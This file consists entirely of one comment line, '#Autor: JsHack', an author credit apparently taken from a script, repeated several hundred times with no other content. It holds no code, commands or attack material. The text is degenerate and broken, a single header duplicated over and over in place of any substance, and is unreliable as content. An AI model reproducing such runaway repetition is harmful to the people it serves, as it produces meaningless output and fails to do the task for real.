#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
